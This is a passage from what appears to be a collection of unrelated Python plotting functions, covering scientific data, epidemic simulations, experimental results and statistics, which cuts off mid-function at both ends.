9.9, 10.03, 0.41, 0.51, 10., 10., 0.291, 0.335)\n try:\n _plotDifferenceIndividualVsJoined(individuals='simulatedResults/RunI*.pkl',\n joined='results/simulated800nmJoint.pkl',\n title='Simulated Data: CCD PSF Recovery', truthx=theta1[7], truthy=theta1[8],\n requirementE=None, requirementFWHM=None, requirementR2=None)\n _plotModelResiduals(id='RunI1', folder='simulatedResults/', out='Residual1.pdf', individual=True)\n except:\n print 'No simulated data to plot...'\n\n #real data\n _plotDifferenceIndividualVsJoined(individuals=folder+'I800nm?.pkl', joined=folder+'J800nm.pkl', title='800nm',\n FWHMlims=(7.3, 11.8))\n\n _plotModelResiduals(id='I800nm2', folder=folder, out='ResidualData.pdf', individual=True)\n _plotModelResiduals(id='RunI2', folder='simulatedResults/', out='Residual2.pdf', individual=True)\n\n #_plotModelResiduals(id='G600nm0', folder=folder, out='ResidualG600.pdf', individual=True)\n #_plotModelResiduals(id='G700nm0', folder=folder, out='ResidualG700.pdf', individual=True)\n _plotModelResiduals(id='G800nm0', folder=folder, out='ResidualG800.pdf', individual=True)\n #_plotModelResiduals(id='G890nm0', folder=folder, out='ResidualG890.pdf', individual=True)\n\n #wavelength dependency\n plotLambdaDependency()\n\n #brighter fatter\n plotBrighterFatter()", "def run_and_plot(self):\n self.raw_processing()\n self.data_averaging_and_cleaning()\n\n print(self.organized_names)\n print(self.organized_film)\n print(self.organized_plank)\n\n height = self.organized_film\n bars = tuple(self.organized_names.copy())\n y_pos = np.arange(len(bars))\n\n plt.bar(y_pos, height)\n plt.xticks(y_pos, bars)\n plt.xlabel('TH% in 100ul water/TH mixture')\n plt.ylabel('CFU/mL count')\n plt.title('Experiment 2.5 (Sucrose Concentration) 7 Aug 2018')\n\n plt.show()\n\n height2 = self.organized_plank\n\n plt.bar(y_pos, height2)\n plt.xticks(y_pos, bars)\n plt.xlabel('TH% in 100ul water/TH mixture')\n plt.ylabel('Proportion of Biofilm CFUs to Planktonic CFUs')\n plt.title('Experiment 2.5 (Sucrose Concentration) 7 Aug 2018')\n\n plt.show()", "def _plotModelResiduals(id='simulated800nmJoint1', folder='results/', out='Residual.pdf', individual=False):\n #data\n if individual:\n data = pf.getdata(folder+id+'small.fits')\n data[data < 1] = 1.\n data = np.log10(data)\n else:\n data = pf.getdata(folder+id+'datafit.fits')\n data[data < 1] = 1.\n data = np.log10(data)\n #model\n model = pf.getdata(folder+id+'model.fits ')\n model[model < 1] = 1.\n model = np.log10(model)\n #residual\n residual = pf.getdata(folder+id+'residual.fits')\n #squared residual\n residualSQ = pf.getdata(folder+id+'residualSQ.fits')\n\n max = np.max((data.max(), model.max()))\n\n #figure\n fig = plt.figure(figsize=(12, 12))\n ax1 = fig.add_subplot(221)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(223)\n ax4 = fig.add_subplot(224)\n ax = [ax1, ax2, ax3, ax4]\n fig.subplots_adjust(hspace=0.05, wspace=0.3, top=0.95, bottom=0.02, left=0.02, right=0.9)\n ax1.set_title('Data')\n ax2.set_title('Model')\n ax3.set_title('Residual')\n ax4.set_title('$L^{2}$ Residual')\n\n im1 = ax1.imshow(data, interpolation='none', vmax=max, origin='lower', vmin=0.1)\n im2 = ax2.imshow(model, interpolation='none', vmax=max, origin='lower', vmin=0.1)\n im3 = ax3.imshow(residual, interpolation='none', origin='lower', vmin=-100, vmax=100)\n im4 = ax4.imshow(residualSQ, interpolation='none', origin='lower', vmin=0., vmax=10)\n\n divider = make_axes_locatable(ax1)\n cax1 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n divider = make_axes_locatable(ax2)\n 
cax2 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n divider = make_axes_locatable(ax3)\n cax3 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n divider = make_axes_locatable(ax4)\n cax4 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cbar1 = plt.colorbar(im1, cax=cax1)\n cbar1.set_label(r'$\\log_{10}(D_{i, j} \\quad [e^{-}]$)')\n cbar2 = plt.colorbar(im2, cax=cax2)\n cbar2.set_label(r'$\\log_{10}(M_{i, j} \\quad [e^{-}]$)')\n cbar3 = plt.colorbar(im3, cax=cax3)\n cbar3.set_label(r'$M_{i, j} - D_{i, j} \\quad [e^{-}]$')\n cbar4 = plt.colorbar(im4, cax=cax4)\n cbar4.set_label(r'$\\frac{(M_{i, j} - D_{i, j})^{2}}{\\sigma_{CCD}^{2}}$')\n\n for tmp in ax:\n plt.sca(tmp)\n plt.xticks(visible=False)\n plt.yticks(visible=False)\n\n plt.savefig(out)\n plt.close()", "def PlotEnsemblePredictions(self,ens, sampling_freq=10, fontSizeLabels=24, fontSizeLegend=20,rescale=1.,pow10first=False):\n pylab.figure()\n\tpylab.axes([0.15,0.35,0.95-0.15,0.95-0.35])\n\tdata_experiments = self.data.experiments\n for independentValues in data_experiments:\n Xdata = self.data.X[independentValues]\n Ydata = self.data.Y[independentValues]\n\t Xtheory = scipy.logspace(scipy.log10(min(Xdata)),scipy.log10(max(Xdata)),num=100)\n\t pointType = self.data.pointType[independentValues]\n\t errorBar = self.data.errorBar[independentValues]\n\t mean_theory = scipy.zeros(len(Xtheory))\n\t std_theory = scipy.zeros(len(Xtheory))\n for i in range(0, num_to_count):\n\t\t ens_theory = self.theory.Y(Xtheory,ens[i*sampling_freq],independentValues)\n\t\t mean_theory += ens_theory\n\t\t std_theory += (ens_theory)**2\n\t mean_theory = mean_theory/(1.0*num_to_count)\n\t std_theory = scipy.sqrt((std_theory-num_to_count*mean_theory**2)/(num_to_count-1.))\n\t pylab.loglog(Xdata,Ydata,pointType[1])\n\t lb = self.getLabel(self.theory.independentNames,independentValues,pow10first=pow10first)\n\t pylab.errorbar(Xdata,Ydata, yerr=errorBar, fmt=pointType,label=lb)\n\t pylab.loglog(Xtheory,mean_theory,pointType[0])\n\t axis_dep=self.getAxis(Xdata,Ydata)\n\t #upper_bound = mean_theory+std_theory\n\t #lower_bound = mean_theory-std_theory\n\t upper_bound = scipy.exp(scipy.log(mean_theory) + scipy.log(1.+std_theory/mean_theory)*rescale)\n\t lower_bound = scipy.exp(scipy.log(mean_theory)+scipy.log(1.-std_theory/mean_theory)*rescale)\n\t for i in range(0, len(lower_bound)):\n\t\t if lower_bound[i]<=0:\n\t\t\t lower_bound[i]=10.**(-16)\n\t pylab.fill_between(Xtheory,lower_bound,y2=upper_bound,color=pointType[0],alpha=0.2)\n\n\t for i, Ax in enumerate(axis_dep):\n\t\t ax0[i] =i%2 and max(ax0[i],Ax) or min(ax0[i],Ax)\n\tpylab.axis(tuple(ax0))\n\tpylab.legend(loc=(-0.15,-0.52),ncol=3)", "def setup_plot(self):\n\n # Get all the healthy, immune, infected, and dead people seperately \n healthy_x = self.putil.population.get_all_healthy()[:, index.x_axis]\n healthy_y = self.putil.population.get_all_healthy()[:, index.y_axis]\n infected_x = self.putil.population.get_all_infected()[:, index.x_axis]\n infected_y = self.putil.population.get_all_infected()[:, index.y_axis]\n immune_x = self.putil.population.get_all_recovered()[:, index.x_axis]\n immune_y = self.putil.population.get_all_recovered()[:, index.y_axis]\n dead_x = self.putil.population.get_all_dead()[:, index.x_axis]\n dead_y = self.putil.population.get_all_dead()[:, index.y_axis]\n total_infected = self.putil.size - len(healthy_x)\n total_hospitalized = len(self.putil.persons[self.putil.persons[:,index.hospitalized] == 3])\n \n # Current healthcare status\n self.healthcare_status = 
\"Normal\"\n \n # Scatter plots to plot people\n self.scat = self.ax.scatter(healthy_x,\n healthy_y, vmin=0, vmax=1,\n cmap=\"jet\", c=\"lightsteelblue\", s=10)\n self.scat2 = self.ax.scatter(infected_x,\n infected_y, vmin=0, vmax=1,\n cmap=\"jet\", c=\"indianred\", s=10)\n self.scat3 = self.ax.scatter(immune_x,\n immune_y, vmin=0, vmax=1,\n cmap=\"jet\", c=\"mediumseagreen\", s=10)\n self.scat4 = self.ax.scatter(dead_x,\n dead_y, vmin=0, vmax=1,\n cmap=\"jet\", c=\"indigo\", s=10)\n # Lists for line graph\n self.infected = []\n self.infected_total = []\n self.deaths = []\n self.frames = []\n self.immunes = []\n self.infected.append(len(infected_x))\n self.deaths.append(len(dead_x))\n self.infected_total.append(self.putil.size - len(healthy_x))\n self.immunes.append(len(immune_x))\n self.frames.append(0)\n\n # Line graph plotting number\n self.total_infected, = self.ax1.plot(self.frames, self.infected_total)\n self.currently_infected, = self.ax1.plot(self.frames, self.infected, c=\"indianred\", label='Currently Infected')\n self.total_deaths, = self.ax1.plot(self.frames, self.deaths, c=\"indigo\", label='Total Dead')\n self.total_immune, = self.ax1.plot(self.frames, self.immunes, c=\"mediumseagreen\", label='Total Immune')\n\n # Code below prints statistics \n if(self.putil.enforce_social_distance_at > 0):\n self.ax1.plot([self.putil.enforce_social_distance_at]*2, [0,self.putil.size],c=\"gold\", label=\"Social Distancing\")\n self.social_distancing_info = (\"At frame \" + str(self.putil.enforce_social_distance_at))\n self.social_distancing_num = str(int(self.putil.social_distance_per * self.putil.size)) + \" or \" + str(self.putil.social_distance_per*100)+\"%\"\n else:\n self.social_distancing_info = (\"Disabled\")\n self.social_distancing_num = \"0 or 0%\"\n\n if(self.putil.enforce_mask_wearing_at > 0):\n self.ax1.plot([self.putil.enforce_mask_wearing_at]*2, [0,self.putil.size],c=\"hotpink\", label=\"Mask Mandate\")\n self.mask_wearing_info = \"At frame \" + str(self.putil.enforce_mask_wearing_at) \n else:\n self.mask_wearing_info = \"Disabled\"\n\n self.ax1.tick_params(axis=\"y\",direction=\"in\", pad=3)\n self.ax1.plot([0,1000],[self.putil.virus.total_healthcare_capacity]*2, c=\"silver\")\n self.ax1.get_xaxis().set_visible(False)\n self.ax1.legend(prop={'size': 8},loc='upper right')\n self.ax2.text(0,1,\"Statistics\", fontsize='large' , fontweight='bold')\n self.ax2.text(0,-0.5, \"Frame:\\nCurrently Infected:\\nHealthy People:\\nImmune People:\\nTotal Deaths:\\nHealthcare Conditions:\")\n self.ax2.text(0.54,-0.5, \"Population:\\nMasks Wearing:\\nSocial Distancing:\\nPeople Distancing:\\nTotal Infected:\\n\")\n self.ax.text(0,1.06, \"Simulation\", fontsize='xx-large' , fontweight='bold')\n self.text = self.ax2.text(0.33, -0.5, \"%i \\n%i \\n%s \\n%s \\n%s \\n%s\" %(0,len(infected_x),str(len(healthy_x)) + \" or 0%\", str(len(immune_x)) + \" or 0%\",str(len(dead_x)) + \" or 0%\",self.healthcare_status))\n self.text2 = self.ax2.text(0.81,-0.5,\"%d \\n%s \\n%s \\n%s \\n%s\\n\" % (self.putil.size, self.mask_wearing_info, self.social_distancing_info, self.social_distancing_num , total_infected))\n\n return self.scat, self.scat2, self.scat3, self.scat4, self.currently_infected, self.total_infected,", "def vaccination_population_plot(r_zero,\n data_file_name='vaccination_data_solution2020-06-16.pkl',\n fig_file_name='model_solution.pdf'):\n df = pd.read_pickle(data_file_name)\n fig, ((ax_s, ax_e, ax_cl), (ax_i_s, ax_i_a, ax_r), (ax_d, ax_v, ax_t)) = plt.subplots(nrows=3, ncols=3)\n #\n n_whole = 
1.0 # without rescaling population\n t = df['time']\n ax_s = plt.subplot(331)\n ax_s.plot(t, n_whole * df['s'], label=\"s\")\n ax_s.legend(loc=0)\n #\n ax_e = plt.subplot(332)\n ax_e.plot(t, n_whole * df['e'], label=\"e\")\n ax_e.legend(loc=0)\n #\n cl = n_whole * (df['s'] + df['e'] + df['i_s'] +\n df['i_a'] + df['r'] + df['d'] +\n df['v'] + df['treat'])\n #\n ax_cl = plt.subplot(333)\n ax_cl.plot(t, cl, label=\"cl\")\n ax_cl.legend(loc=0)\n #\n ax_i_s = plt.subplot(334)\n ax_i_s.plot(t, n_whole * df['i_s'], label=\"i_s\")\n ax_i_s.legend(loc=0)\n #\n ax_i_a = plt.subplot(335)\n ax_i_a.plot(t, n_whole * df['i_a'], label=\"i_a\")\n ax_i_a.legend(loc=0)\n #\n ax_r = plt.subplot(336)\n ax_r.plot(t, n_whole * df['r'], label=\"r\")\n ax_r.legend(loc=0)\n #\n ax_d = plt.subplot(337)\n ax_d.plot(t, n_whole * df['d'], label=\"d\")\n ax_d.legend(loc=0)\n #\n ax_v = plt.subplot(338)\n ax_v.plot(t, n_whole * df['v'], label=\"v\")\n ax_v.legend(loc=0)\n #\n ax_t = plt.subplot(339)\n ax_t.plot(t, n_whole * df['treat'], label=\"treat\")\n ax_t.legend(loc=0)\n #\n plt.tight_layout()\n fig.suptitle(\"R0: \" + str(r_zero))\n plt.savefig(fig_file_name)\n plt.show()\n return", "def plot_for_pop(exp,correctp,data_crop,IV,DV,bins,xticklabels,xlabel,ylabel,robust=0):\n \n\n \n if not os.path.exists('plots'):\n os.makedirs('plots')\n \n if exp == 'POP1':\n logLossmedian=1.386294\n colors = [\"orangered\", \"silver\"]\n else:\n logLossmedian=1.098612\n colors = [\"steelblue\", \"silver\"]\n \n customPalette = sns.set_palette(sns.color_palette(colors))\n plt.rc('font', size=15) \n \n if IV=='Final.balance':\n correctp.loc[correctp['logLoss.streak'] == 0]\n if IV=='logLoss.streak':\n correctp.loc[correctp['Final.balance'] == 0]\n if IV == 'logResult':\n correctp.loc[correctp['Final.balance'] == 0]\n\n # Predicted\n IV_p=correctp.groupby(['group',IV]).mean().loc[:,'predicted']\n IV_p=IV_p.unstack(level=0)\n IV_p=pd.DataFrame(IV_p)\n if exp == 'POP1':\n #IV_p.reset_index(inplace=True)\n IV_p=IV_p.loc[:,['Voucher predicted','Cash predicted']]\n print(IV_p)\n # Raw Data\n # Create arbitrary bins and check N in each\n data_crop.loc[:,'IV.binned']=pd.cut(data_crop.loc[:,IV], \n bins=bins)\n IV_nbins=pd.cut(data_crop.loc[:,IV], \n bins=bins).value_counts()\n IV_data=data_crop.groupby(['Participant','IV.binned','group']).mean().loc[:,DV]\n IV_data=pd.DataFrame(IV_data)\n\n IV_data = IV_data.stack(level=0).reset_index(level=0) \\\n .reset_index().drop('level_2',axis=1) \\\n .rename(columns={0:'DV'})\n print(IV_nbins)\n IV_nbins.to_csv('plots/'+IV+'binN.csv',header=False )\n # Build figure\n fig, (ax1, ax2) = plt.subplots(1,2,figsize=(8,4),sharey=True)\n #boxplot ax1\n if exp=='POP1':\n sns.boxplot(y='DV', x='IV.binned',data=IV_data,hue='group',\n ax=ax1,palette=customPalette,linewidth=1,fliersize=5, hue_order=['Voucher data','Cash data'])\n else:\n sns.boxplot(y='DV', x='IV.binned',data=IV_data,hue='group',\n ax=ax1,palette=customPalette,linewidth=1,fliersize=5)\n if IV == 'Trial.type.binary':\n IV_p.plot.bar(ax=ax2)\n ax1.xaxis.set_ticklabels(['Win','Loss'])\n ax2.xaxis.set_ticklabels(['Win','Loss'],rotation=0)\n else:\n IV_p.plot(ax=ax2)\n ax1.set_ylabel(ylabel)\n ax2.set_ylabel(ylabel)\n ax1.set_xlabel(xlabel)\n ax2.set_xlabel(xlabel)\n fig.legend(title=None,loc=1,frameon=False)\n ax1.legend().set_visible(False)\n ax2.legend().set_visible(False)\n if DV == 'logISI':\n ax1.set_ylim(bottom=5,top=9.5)\n # Change yaxis labels for boxplot - use minor ticks to define edges and turn off major\n xbins=[]\n for i in 
np.arange(-0.5, 100,1):\n xbins.append(i)\n if len(xbins)==len(xticklabels):\n break\n if IV != 'Trial.type.binary':\n ax1.xaxis.set_ticks(xbins,minor=True)\n ax1.xaxis.set_ticklabels(xticklabels,minor=True)\n ax1.xaxis.set_ticks([])\n ax1.xaxis.set_tick_params(which='minor',length=4)\n sns.despine(top=True,right=True)\n plt.tight_layout()\n if robust==1:\n fig.savefig(fname='plots/robust_'+IV +'.png',format='png',transparent=True)\n fig.savefig(fname='plots/robust_'+IV + '.eps',format='eps',transparent=True)\n else:\n fig.savefig(fname='plots/'+IV +'.png',format='png',transparent=True)\n fig.savefig(fname='plots/'+IV + '.eps',format='eps',transparent=True)", "def plot_ave_profile(f,y):\n favex = np.mean(f, axis=1) # Horizontal average\n\n # Plot\n fig, ax = plt.subplots(1,1, figsize=(15,9))\n ax.plot(favex, y)\n\n # Label\n ax.set_xlabel(r'$\\overline{T}$')\n ax.set_ylabel(r'$y$')\n fig.tight_layout()\n\n # Save\n fig.savefig('Tave.pdf')\n \n plt.show()", "def p_plot(data,pv_index=0,alpha=0.05):\n ####if it's a pd.dataframe, rename to col header\n if isinstance(data, pd.DataFrame):\n if isinstance(pv_index, int):\n pv_index = data.columns.get_values()[pv_index]\n data =data.rename(columns ={pv_index: \"p_value\"})\n if not (np.issubdtype(data['p_value'].dtypes, np.number)):\n raise TypeError(\"Please ensure you have specified the column index of numeric p-values.\")\n ###or make a vector a pd.dataframe\n else:\n data = pd.DataFrame({\"p_value\": data})\n \n if (data[\"p_value\"].max()> 1) or (data[\"p_value\"].max()< 0):\n raise ProbabilityError(\"One or more p-values is not between 0 and 1!\")\n \n m = len(data['p_value'])\n\n data = data.sort_values('p_value',ascending=True)\n data['rank'] = np.arange(1,len(data['p_value'])+1)\n data['critical_value'] = data['rank']*alpha/m\n\n fig = plt.clf()\n plt.scatter(data['rank'],data['p_value'],color='black')\n plt.axhline(y=alpha,label='Bonferroni')\n plt.plot(data['rank'],data['critical_value'],label='BH',color='red')\n plt.legend()\n plt.title(\"Bonferroni vs BH\")\n plt.xlabel(\"Rank\")\n plt.ylabel(\"p(k)\")\n return fig", "def main(logy):\n filep = sys.stdin\n dataf = pd.read_csv(filep, sep=\" \", index_col=0, header=None)\n dataf.plot(logy=logy)\n print(dataf)\n plt.savefig(\"scaling.pdf\")", "def show_results(self):\n\n N = split_list(self.N)\n # create subplot\n fig = make_subplots(rows=1,cols=2,\n subplot_titles=('Fish population', 'Harvested fish'),\n specs=[[{'type': 'xy'}, {'type': 'pie'}]])\n #Add population line graph\n fig.add_trace(go.Scatter(y=N['odds'], x=np.linspace(1, 11, 6), name='odd year population',\n hovertemplate =\n 'Year: %{x}'+ '<br>Pop: %{y}'),\n row=1, col=1)\n fig.add_trace(go.Scatter(y=N['evens'], x=np.linspace(2, 12, 6), name='even year population',\n hovertemplate =\n 'Year: %{x}'+ '<br>Pop: %{y}'),\n row=1, col=1)\n fig.update_xaxes(title_text=\"year\", row=1, col=1)\n fig.update_yaxes(title_text=\"population\", row=1, col=1)\n\n # cannot use 'paper' as yref due to bug in sublplot.\n fig.add_shape(type='line',\n xref='x', yref='y',\n x0=2.5, y0=-10, x1=2.5, y1=1000,\n line=dict(color='Black', width=3),\n row=1, col=1)\n\n # create pie chart\n colors = ['#636EFA', '#EF553B'] \n labels = ['total odd year harvest', 'total even year harvest']\n M = split_list(self.harvest_record)\n values = [sum(M['odds']), sum(M['evens'])]\n fig.add_trace(go.Pie(labels=labels, values=values, hoverinfo='label', textinfo='value', marker=dict(colors=colors)), \n row=1, col=2)\n\n # add title\n 
fig.update_layout(title_text='Results') \n fig.write_html(\"fish_trap_simulation.html\")\n\n \n return fig", "def plot_spatial_res(data_obj, test_num):\n\n #---------------------------------------------------------------------------------------------#\n # Go through each file [image] and plot the spatial resolution ROI images and MTF data graphs #\n #---------------------------------------------------------------------------------------------#\n for i in range(len(data_obj.files)):\n\n fig = new_pdf_page(data_obj.pdf_obj) #Create a new pdf page\n plt.axis('off')\n\n # Create and plot the (centered) title of the page - that also states the MTF20 values\n str1 = 'Test ' + str(test_num) + ': Spatial Resolution \\n' + \\\n 'MTF20x = ' + \"{0:.2f}\".format(data_obj.MTF_data.MTF20_x) + \\\n '\\n MTF20y = ' + \"{0:.2f}\".format(data_obj.MTF_data.MTF20_y)\n plt.suptitle(str1)\n\n #-----------------------------------------------#\n # Plot the main image in the middle of the page #\n #-----------------------------------------------#\n ax1 = fig.add_subplot(312)\n plt.imshow(data_obj.img_data[i].lead_foil_ROI.img) #Display the ROI image of the lead foil\n\n # Display the title of the ROI image - the orientation\n plt.title('Orientation ' + str(data_obj.img_data[i].orientation))\n plt.xticks([]) # labels\n plt.yticks([])\n ax = plt.gca()\n ax.xaxis.set_ticks_position('none') # tick markers\n ax.yaxis.set_ticks_position('none')\n\n if data_obj.img_data[i].orientation % 2 == 1:\n plt.xlabel('x axis')\n plt.ylabel('y axis')\n else:\n plt.xlabel('y axis')\n plt.ylabel('x axis')\n\n #-----------------------------#\n # Display the Horizontal plot #\n #-----------------------------#\n ax2 = fig.add_subplot(325)\n plt.ylabel('MTFx')\n plt.xlabel('Spatial frequency (cycles/mm)')\n plt.plot(data_obj.img_data[i].MTF_obj.MTF_x_f, data_obj.img_data[i].MTF_obj.MTF_x)\n text = 'MTF20x = ' + \"{0:.2f}\".format(data_obj.img_data[i].MTF_obj.MTF20_x)\n\n ax2.annotate(text,\n xy=(data_obj.img_data[i].MTF_obj.MTF20_x, 0.2),\n xytext=(np.max(data_obj.img_data[i].MTF_obj.MTF_x_f), 0.7),\n arrowprops=dict(facecolor='black', shrink=0.05, width=0.5, headwidth=4),\n horizontalalignment='right')\n\n #---------------#\n # Vertical plot #\n #---------------#\n ax3 = fig.add_subplot(326)\n plt.ylabel('MTFy')\n plt.xlabel('Spatial frequency (cycles/mm)')\n plt.plot(data_obj.img_data[i].MTF_obj.MTF_y_f, data_obj.img_data[i].MTF_obj.MTF_y)\n text = 'MTF20y = ' + \"{0:.2f}\".format(data_obj.img_data[i].MTF_obj.MTF20_y)\n\n ax3.annotate(text,\n xy=(data_obj.img_data[i].MTF_obj.MTF20_y, 0.2),\n xytext=(np.max(data_obj.img_data[i].MTF_obj.MTF_y_f), 0.7),\n arrowprops=dict(facecolor='black', shrink=0.05, width=0.5, headwidth=4),\n horizontalalignment='right')", "def plot(self, dtables, figs, **kwargs):\n self.safe_update(**kwargs)\n sumtable = dtables['biasoscorr_stats']\n figs.plot_stat_color('mean-s', sumtable['s_correl_mean'].reshape(9, 16))\n figs.plot_stat_color('mean-p', sumtable['p_correl_mean'].reshape(9, 16))", "def dofigure5():\n required = {'Plastocyanin (Phormidium)':[61,92],\n 'Plastocyanin (Anabaena variabilis)':[62,92],\n 'Bovine Beta-Lactoglobulin':[64,114]}\n \n for p in DB.getRecs():\n prot = DB[p]['name']\n if prot in required:\n Eh = data=DB[p]['1H NMR']\n En = data=DB[p]['15N NMR']\n for d in Eh.datasets:\n hdata = Eh.getDataset(d)\n num = int(t.getResidueFields(hdata)['res_num'])\n #print d, type(num), required[prot]\n if num in required[prot]:\n print num\n ndata = En.getDataset(d)\n Eh.plotDatasets(d, 
filename=d+'.png')\n    return", "def analyse():\n    health = db.execute(\"SELECT * FROM health WHERE user_ID = :id\", id=session[\"user_id\"])\n    phone = db.execute(\"SELECT * FROM usage WHERE user_ID = :id\", id=session[\"user_id\"])\n    hdata, pdata = [], []\n    # get relevant values for health data then put values into two arrays\n    for i in range(3):\n        health1 = [health[i][h] for h in health[i]]\n        hdata.append(health1[2:6])\n    hdata = np.array(hdata)\n    hdata[[0, 2]] = hdata[[2, 0]]\n    print(np.mean(hdata, axis = 0))\n    print(np.std(hdata, axis = 0))\n    print(np.median(hdata, axis = 0))\n\n    # get relevant values for phone data then put values into 2D array\n    for i in range(3):\n        phone1 = [phone[i][h] for h in phone[i]]\n        pdata.append(phone1[2:7] + phone1[9:14])\n    pdata = np.array(pdata)\n    red = pdata[...,2]\n    dep = []\n    print(red)\n    for i in hdata[...,0]:\n        dep.append(int(i))\n    dep = np.array(dep)\n    print(dep)\n    # pearson\n    print (np.corrcoef(red, dep ))\n\n\n\n    return render_template(\"stats.html\",)", "def show_stats(self):\n    if len(self.keypoints) == 0:\n        logger.warning(\"No keypoints yet: running process before display\")\n        self.process()\n    import pylab\n    f = pylab.figure()\n    ax = f.add_subplot(1, 1, 1)\n    ax.plot(self.keypoints.sigma, self.keypoints.I, '.r')\n    ax.set_xlabel(\"Sigma\")\n    ax.set_ylabel(\"Intensity\")\n    ax.set_title(\"Peak repartition\")\n    f.show()", "def plot_precision_figure(self):\n\n    data_analysis = DatabaseData(dataframe=self.plot_data)\n    prop_data, energy_data, M, C, pred_energy, pred_property = \\\n    data_analysis.create_precision_bokeh_compat(self.prop_data, self.energy_data, properties=self.properties)\n    p = figure(plot_height=400, plot_width=400,tools=\"pan,wheel_zoom,box_zoom,reset,previewsave\",\\\n    x_axis_type=\"log\", y_axis_type=\"log\", x_axis_label='Energy Convergence (meV/atom)', title='Slope M is {0}'.format(str(M)) )\n    p.line(pred_energy, pred_property, color='red')\n    p.circle(self.energy_data, self.prop_data, color='blue',size=5, line_alpha=0)\n    #p.multi_line(xs_err, ys_err, color='black')\n    if self.properties == 'B':\n        p.yaxis.axis_label = 'Bulk Modulus B (%)'\n    elif self.properties == 'dB':\n        p.yaxis.axis_label = 'Bulk Modulus Pressure Derivative (%)'\n    elif self.properties == 'Multiple':\n        p.yaxis.axis_label = \"V0, B, B' (%)\"\n    elif self.properties == 'V0':\n        p.yaxis.axis_label = 'Volume (%)'\n\n    return p", "def gen_plots(uf_dict, f_dict, min_x, max_x, min_y, max_y, axes, name, histogram, total):\n    with PdfPages(name) as pdf:\n        total_xuf = []\n        total_yuf = []\n        total_xf = []\n        total_yf = []\n        for entry in uf_dict:\n            print 'Making plot for ' + entry\n            xuf, yuf = zip(*uf_dict[entry])\n            fig = plt.figure()\n            ax1 = fig.add_subplot(111)\n            ax1.scatter(xuf, yuf, c='#ad4851', marker='o', label='initial structures')\n            try:\n                xf, yf = zip(*f_dict[entry])\n                ax1.scatter(xf, yf, c='orange', marker='x', label='selected structures')\n            except ValueError:\n                xf = []\n                yf = []\n            plt.legend(loc='upper right')\n            plt.title(entry, fontsize=30)\n            plt.xlim(min_x, max_x)\n            plt.ylim(min_y, max_y)\n            plt.xlabel(axes[0], fontsize=20)\n            plt.ylabel(axes[1], fontsize=20)\n            pdf.savefig(fig)\n            plt.close()\n\n            if total:\n                total_xuf.extend(xuf)\n                total_yuf.extend(yuf)\n                total_xf.extend(xf)\n                total_yf.extend(yf)\n\n            if histogram:\n                bins = np.linspace(min_y, max_y, num=10)\n                plt.hist(yuf, bins, alpha=0.5, color='b', label='initial structures')\n                try:\n                    plt.hist(yf, bins, alpha=0.5, color='orange', label='selected structures')\n                except ValueError:\n                    pass\n                plt.legend(loc='upper right')\n                
plt.title(entry, fontsize=30)\n plt.xlabel(axes[1], fontsize=20)\n plt.ylabel('Frequency', fontsize=20)\n pdf.savefig()\n plt.close()\n\n if total:\n print 'Making composite plot'\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.scatter(total_xuf, total_yuf, c='#ad4851', marker='o', label='initial structures')\n ax1.scatter(total_xf, total_yf, c='orange', marker='x', label='selected structures')\n plt.legend(loc='upper right')\n plt.title('Composite Plot', fontsize=30)\n plt.xlim(min_x, max_x)\n plt.ylim(min_y, max_y)\n plt.xlabel(axes[0], fontsize=20)\n plt.ylabel(axes[1], fontsize=20)\n pdf.savefig(fig)\n plt.close()", "def plot(self,experiment_id = None,image_path = None):\n c = self.cursor()\n where_experiment_id = ''\n if not experiment_id is None:\n if isinstance(experiment_id, list):\n exp_ids = ','.join([ str(f) for f in experiment_id ])\n where_experiment_id = ' WHERE id in ({})'.format(exp_ids)\n else:\n where_experiment_id = ' WHERE id = {}'.format(experiment_id)\n c.execute(\n 'SELECT exp_id,exp_name,exp_description,var_name FROM experiment'\n + where_experiment_id\n )\n experiments = c.fetchall()\n exp_count = len(experiments)\n fig, axs = plt.subplots(exp_count)\n if exp_count == 1:\n axs = [axs]\n trend = lambda a,b: np.poly1d(np.polyfit(a, b, 1))(a)\n for i in range(exp_count):\n axs[i].set_title(experiments[i]['exp_name'])\n axs[i].set_xlabel(experiments[i]['exp_description'])\n # build x-axis \n x_axis = []\n c.execute(\n '''\n SELECT val FROM fact\n WHERE var_name = ?\n AND exp_id = ?\n ORDER BY step_id ASC\n ''',\n (\n experiments[i]['var_name'],\n experiments[i]['exp_id']\n )\n )\n x_axis = [r['val'] for r in c.fetchall()]\n c.execute(\n '''\n SELECT DISTINCT var_name FROM fact \n WHERE exp_id = ? AND var_name != ?\n ORDER BY var_name ASC\n ''',\n (experiments[i]['exp_id'],experiments[i]['var_name'])\n )\n variables = [r['var_name'] for r in c.fetchall()]\n for variable in variables:\n c.execute(\n '''\n SELECT val FROM fact\n WHERE exp_id = ? 
AND var_name = ?\n ORDER BY step_id ASC \n ''',\n (experiments[i]['exp_id'], variable)\n )\n y_axis = [r['val'] for r in c.fetchall()]\n axs[i].scatter(x_axis, y_axis)\n axs[i].plot(x_axis,trend(x_axis, y_axis),label=variable)\n axs[i].legend()\n fig.tight_layout()\n # save into image on headless machine\n if not image_path is None:\n plt.savefig(image_path)\n else:\n try:\n plt.show()\n except:\n plt.savefig(\"plot.png\") \n self.commit()", "def plot_data(df, title=\"normalized Stock prices\", ylabel=\"Price\", xlabel=\"Date\" ):\n plt.clf()\n ax = df.plot(title=title, fontsize=12)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n plt.savefig('files/output/'+title+'.png')", "def plotting(dataframe, prod_num):\n fig, axs = plt.subplots(2, sharex=True)\n axs[0].plot(dataframe['STU'])\n axs[1].plot(dataframe['STU'].diff().dropna())\n axs[0].set_title(\"Time Series of Product\" + f\"_{prod_num}\")\n axs[1].set_title(\"Differenced Time Series of Product\" + f\"_{prod_num}\")\n plt.savefig(\"Time Series of Product\" + f\"_{prod_num}\" + \".pdf\")", "def plot(plot_count, density_map, padding, name):\n density_map = density_map[padding:-1 - padding, padding:-1 - padding]\n print(\"max density = %g\" % (np.amax(density_map)))\n print(\"mean density = %g\" % (np.mean(density_map)))\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n x = np.arange(density_map.shape[0])\n y = np.arange(density_map.shape[1])\n\n x, y = np.meshgrid(x, y)\n ax.plot_surface(x, y, 